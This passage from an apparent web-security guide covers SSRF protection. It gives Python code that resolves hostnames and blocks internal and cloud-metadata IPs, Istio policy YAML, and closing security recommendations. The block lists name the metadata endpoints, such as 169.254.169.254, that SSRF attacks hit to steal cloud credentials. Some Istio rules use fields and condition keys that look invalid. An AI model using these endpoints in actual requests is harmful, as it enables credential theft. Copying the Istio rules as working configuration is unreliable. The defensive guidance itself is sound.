"""
Resolve DNS and apply filtering rules
"""
try:
parsed = urlparse(url)
hostname = parsed.hostname
# Resolve DNS
ip_addresses = socket.getaddrinfo(
hostname,
None,
socket.AF_UNSPEC
)
# Extract IP addresses
ips = []
for family, _, _, _, sockaddr in ip_addresses:
if family == socket.AF_INET:
ips.append(sockaddr[0])
elif family == socket.AF_INET6:
ips.append(sockaddr[0])
# Apply filtering rules
for ip in ips:
# Check against deny list
if self.is_denied_ip(ip):
return ResolutionResult(
allowed=False,
reason=f'IP address denied: {ip}',
ip_addresses=ips
)
# Check against internal ranges
if self.is_internal_ip(ip):
return ResolutionResult(
allowed=False,
reason=f'Internal IP address: {ip}',
ip_addresses=ips
)
# Check for cloud metadata
if self.is_cloud_metadata_ip(ip):
return ResolutionResult(
allowed=False,
reason=f'Cloud metadata IP: {ip}',
ip_addresses=ips
)
# Check against allow list if configured
if self.has_allow_list():
if not self.is_allowed_hostname(hostname):
return ResolutionResult(
allowed=False,
reason=f'Hostname not in allow list: {hostname}',
ip_addresses=ips
)
return ResolutionResult(
allowed=True,
ip_addresses=ips,
hostname=hostname
)
except socket.gaierror:
return ResolutionResult(
allowed=False,
reason=f'Could not resolve hostname: {hostname}'
)
except Exception as e:
return ResolutionResult(
allowed=False,
reason=f'DNS resolution error: {str(e)}'
)
def is_internal_ip(self, ip):
"""
Check if IP address is internal
"""
try:
ip_obj = ipaddress.ip_address(ip)
internal_ranges = [
ipaddress.ip_network('10.0.0.0/8'),
ipaddress.ip_network('172.16.0.0/12'),
ipaddress.ip_network('192.168.0.0/16'),
ipaddress.ip_network('127.0.0.0/8'),
ipaddress.ip_network('169.254.0.0/16'),
ipaddress.ip_network('::1/128'),
ipaddress.ip_network('fc00::/7'), # IPv6 unique local
ipaddress.ip_network('fe80::/10'), # IPv6 link-local
]
for network in internal_ranges:
if ip_obj in network:
return True
# Docker bridge (172.17.0.0/16) and common Kubernetes service CIDRs (10.x)
# are already covered by the 172.16.0.0/12 and 10.0.0.0/8 ranges above
return False
except ValueError:
return False
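In practice the protection layer sits in front of whatever HTTP client the application uses, so every outbound fetch is validated, resolved, filtered, and rate-limited before a socket is opened. Below is a hedged sketch assuming the requests library, the SSRFProtectionError type referenced above, and that the safe request returned by process_request exposes a "url" field.

```python
# Sketch of using the protection layer as a mandatory gate in front of requests.
import requests

protection = SSRFProtectionLayer()

def safe_fetch(url, client_id):
    safe_request = protection.process_request({
        "url": url,
        "client_id": client_id,
        "method": "GET",
    })
    # Follow no redirects: a redirect is a second, unvalidated destination
    return requests.get(safe_request["url"], timeout=5, allow_redirects=False)

try:
    resp = safe_fetch("https://api.stripe.com/v1/charges", client_id="billing-service")
except SSRFProtectionError as exc:
    # Log and surface a generic error to the caller
    print(f"blocked outbound request: {exc}")
```

Cloud-Native SSRF Protection with Service Mesh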
# service-mesh-ssrf-protection.yaml
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: ssrf-protection
namespace: production
spec:
selector:
matchLabels:
app: external-api-consumer
action: DENY
rules:
# Rule 1: Deny requests to internal IP ranges
- to:
- operation:
hosts:
- "10.0.0.0/8"
- "172.16.0.0/12"
- "192.168.0.0/16"
- "127.0.0.0/8"
- "169.254.0.0/16"
- "::1/128"
# Rule 2: Deny requests to cloud metadata
- to:
- operation:
hosts:
- "169.254.169.254"
- "metadata.google.internal"
- "192.0.0.192"
- "100.100.100.200"
# Rule 3: Allow only specific external domains
- to:
- operation:
notHosts:
- "api.stripe.com"
- "api.twilio.com"
- "webhook.slack.com"
- "hooks.zapier.com"
when:
- key: request.headers[user-agent]
values:
- "external-api-consumer/*"
# Rule 4: Rate limiting
- to:
- operation:
hosts: ["*"]
when:
- key: connection.sni
notValues: ["allowed-external.com"]
- key: "ratelimit.requests"
values: ["exceeded"]
# Rule 5: Protocol restrictions
- to:
- operation:
ports: ["80", "443"]
when:
- key: "network.protocol"
notValues: ["tcp"]
---
apiVersion: networking.istio.io/v1beta1
kind: ServiceEntry
metadata:
name: external-services
namespace: production
spec:
hosts:
- api.stripe.com
- api.twilio.com
- webhook.slack.com
- hooks.zapier.com
ports:
- number: 443
name: https
protocol: HTTPS
- number: 80
name: http
protocol: HTTP
resolution: DNS
location: MESH_EXTERNAL
---
apiVersion: security.istio.io/v1beta1
kind: RequestAuthentication
metadata:
name: external-api-auth
namespace: production
spec:
selector:
matchLabels:
app: external-api-consumer
jwtRules:
- issuer: "https://auth.company.com/"
jwksUri: "https://auth.company.com/.well-known/jwks.json"
fromHeaders:
- name: "X-API-Key"
outputPayloadToHeader: "x-jwt-payload"
---
apiVersion: telemetry.istio.io/v1alpha1
kind: Telemetry
metadata:
name: external-requests-metrics
namespace: production
spec:
selector:
matchLabels:
app: external-api-consumer
metrics:
- providers:
- name: prometheus
overrides:
- match:
metric: REQUEST_COUNT
mode: CLIENT
tagOverrides:
destination_host:
operation: UPSERT
value: "request.host"
destination_ip:
operation: UPSERT
value: "destination.ip"
response_code:
operation: UPSERT
value: "response.code"
ssrf_attempt:
operation: UPSERT
value: "conditional((request.host == '169.254.169.254'), 'true', 'false')"The OWASP Top 10 vulnerabilities represent not just technical flaws, but fundamental gaps in our approach to application security. As we've explored in this comprehensive guide, modern applications face sophisticated threats that require equally sophisticated defenses.
Several trends are reshaping how those defenses will be built:

1. Shift-Left Security Integration
   - Security requirements defined during the design phase
   - Automated security testing in CI/CD pipelines
   - Developer security training and awareness
2. Zero-Trust Architecture Adoption
   - Never trust, always verify
   - Micro-segmentation and least privilege
   - Continuous authentication and authorization
3. AI and Machine Learning in Security
   - Behavioral anomaly detection
   - Automated threat hunting
   - Predictive vulnerability assessment
4. Supply Chain Security Focus
   - Software Bill of Materials (SBOM) adoption
   - Provenance and integrity verification
   - Dependency vulnerability management
5. Privacy by Design
   - Data minimization and anonymization
   - Privacy-preserving computation
   - Regulatory compliance automation

Whatever shape those trends take, the practical recommendations remain consistent:

1. Adopt a Defense-in-Depth Strategy
   - Multiple layers of security controls
   - Fail-secure design principles
   - Regular security testing and assessment
2. Implement Continuous Security Monitoring
   - Real-time threat detection
   - Automated incident response
   - Security metrics and reporting
3. Foster a Security Culture
   - Security champions program
   - Regular training and awareness
   - Bug bounty and responsible disclosure programs
4. Embrace Security Automation
   - Infrastructure as Code with security baked in
   - Automated compliance checking
   - Self-healing security systems
5. Prepare for Quantum Computing
   - Post-quantum cryptography migration
   - Quantum-resistant algorithms
   - Crypto-agility frameworks
The landscape of web application security is constantly evolving, but by understanding these fundamental vulnerabilities and implementing comprehensive defenses, organizations can significantly reduce their risk exposure and build more secure applications for the future.